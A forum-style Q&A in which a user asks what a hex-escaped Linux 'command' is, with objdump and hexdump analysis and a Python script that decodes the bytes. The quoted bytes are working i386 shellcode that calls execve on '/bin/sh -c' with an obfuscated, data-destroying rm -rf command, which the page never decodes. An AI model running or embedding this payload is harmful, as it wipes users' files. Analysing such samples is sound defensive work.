linux - What is the hex version of a command, what does it mean in reality, and how is this done?


I have noticed a command in the form of hex characters; it says it is the hex version of a command (Linux). What does "hex version" mean, and how can I convert it to human readable form? Of this I know:

  • \ : escape sequence
  • x : stands for hex

The command is listed below...

"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00"

But how can I convert it to the original command in English, "xxxxxxxx"?

I took the binary and ran it through hexdump -vC and objdump:

$ objdump -b binary -m i386 -d output

output:     file format binary

Disassembly of section .data:

00000000 <.data>:
   0:   eb 3e                   jmp    0x40
   2:   5b                      pop    %ebx
   3:   31 c0                   xor    %eax,%eax
   5:   50                      push   %eax
   6:   54                      push   %esp
   7:   5a                      pop    %edx
   8:   83 ec 64                sub    $0x64,%esp
   b:   68 ff ff ff ff          push   $0xffffffff
  10:   68 df d0 df d9          push   $0xd9dfd0df
  15:   68 8d 99 df 81          push   $0x81df998d
  1a:   68 8d 92 df d2          push   $0xd2df928d
  1f:   54                      push   %esp
  20:   5e                      pop    %esi
  21:   f7 16                   notl   (%esi)
  23:   f7 56 04                notl   0x4(%esi)
  26:   f7 56 08                notl   0x8(%esi)
  29:   f7 56 0c                notl   0xc(%esi)
  2c:   83 c4 74                add    $0x74,%esp
  2f:   56                      push   %esi
  30:   8d 73 08                lea    0x8(%ebx),%esi
  33:   56                      push   %esi
  34:   53                      push   %ebx
  35:   54                      push   %esp
  36:   59                      pop    %ecx
  37:   b0 0b                   mov    $0xb,%al
  39:   cd 80                   int    $0x80
  3b:   31 c0                   xor    %eax,%eax
  3d:   40                      inc    %eax
  3e:   eb f9                   jmp    0x39
  40:   e8 bd ff ff ff          call   0x2
  45:   2f                      das
  46:   62 69 6e                bound  %ebp,0x6e(%ecx)
  49:   2f                      das
  4a:   73 68                   jae    0xb4
  4c:   00                      .byte 0x0
  4d:   2d                      .byte 0x2d
  4e:   63 00                   arpl   %ax,(%eax)
	...

$ hexdump -vC output
00000000  eb 3e 5b 31 c0 50 54 5a  83 ec 64 68 ff ff ff ff  |.>[1.PTZ..dh....|
00000010  68 df d0 df d9 68 8d 99  df 81 68 8d 92 df d2 54  |h....h....h....T|
00000020  5e f7 16 f7 56 04 f7 56  08 f7 56 0c 83 c4 74 56  |^...V..V..V...tV|
00000030  8d 73 08 56 53 54 59 b0  0b cd 80 31 c0 40 eb f9  |.s.VSTY....1.@..|
00000040  e8 bd ff ff ff 2f 62 69  6e 2f 73 68 00 2d 63 00  |...../bin/sh.-c.|
00000050  00                                                |.|
00000051

It is a kind of program. It first jumps to offset 0x40, then uses call 0x2 to set the stack up; then follows a bunch of operations, including a system call. The program data appears to start at offset 0x45 and contains the string "/bin/sh -c".

The system call in question is #11 (mov $0xb,%al), which according to this table is sys_execve. I'd guess it's trying to run a shell. Is the code intended to exploit buffer overflows?
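As an added example (not part of the original question or answer), a Python script that does the decoding step the question asks about: it joins the adjacent C literals, turns the \xHH escapes into bytes, prints the same hexdump -C layout the answer used, and then pulls out the NUL-terminated strings and the int $0x80 syscall number that the answer identified by hand. The syscall check is a heuristic of mine that only recognizes an immediately preceding mov $imm8,%al.

```python
import re

# Constructed input: the escaped literal as quoted in the question, kept as a
# raw string so the backslashes survive verbatim.
LITERAL = (r'"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" '
           r'"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" '
           r'"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" '
           r'"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" '
           r'"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" '
           r'"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" '
           r'"\x6e\x2f\x73\x68\x00\x2d\x63\x00"')


def c_literal_to_bytes(text):
    """Concatenate adjacent C "..." literals and decode \\xHH, octal and
    \\n-style escapes (the unicode_escape codec knows all of them)."""
    pieces = re.findall(r'"((?:\\.|[^"\\])*)"', text)
    return b"".join(p.encode("latin-1").decode("unicode_escape").encode("latin-1")
                    for p in pieces)


def hexdump_c(data):
    """Render bytes in the layout of `hexdump -C`, including the final offset line."""
    lines = []
    for off in range(0, len(data), 16):
        hexs = [f"{b:02x}" for b in data[off:off + 16]]
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in data[off:off + 16])
        lines.append(f"{off:08x}  {' '.join(hexs[:8]):<23}  {' '.join(hexs[8:]):<23}  |{asc}|")
    lines.append(f"{len(data):08x}")
    return lines


def nul_terminated_strings(data, min_len=2):
    """(offset, text) for printable runs that end in a NUL byte, as C strings do."""
    pat = re.compile(rb"([\x20-\x7e]{%d,})\x00" % min_len)
    return [(m.start(), m.group(1).decode("ascii")) for m in pat.finditer(data)]


def int80_syscalls(data):
    """Heuristic: for each `int $0x80` (cd 80) directly preceded by
    `mov $imm8,%al` (b0 NN), return (offset of the int, syscall number)."""
    return [(m.start(), data[m.start() - 1])
            for m in re.finditer(rb"\xcd\x80", data)
            if m.start() >= 2 and data[m.start() - 2] == 0xB0]


DECODED = c_literal_to_bytes(LITERAL)

if __name__ == "__main__":
    print("\n".join(hexdump_c(DECODED)))
    for off, s in nul_terminated_strings(DECODED):
        print(f"string at {off:#x}: {s!r}")
    for off, nr in int80_syscalls(DECODED):
        print(f"int 0x80 at {off:#x}, %al = {nr} (11 = sys_execve on i386)")
```

Running it reproduces the first five hexdump lines from the answer and reports "/bin/sh" at 0x45, "-c" at 0x4d and syscall 11 at 0x39; the 0x51st byte in the answer's dump is the C string terminator written with the file, which the literal itself does not contain.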

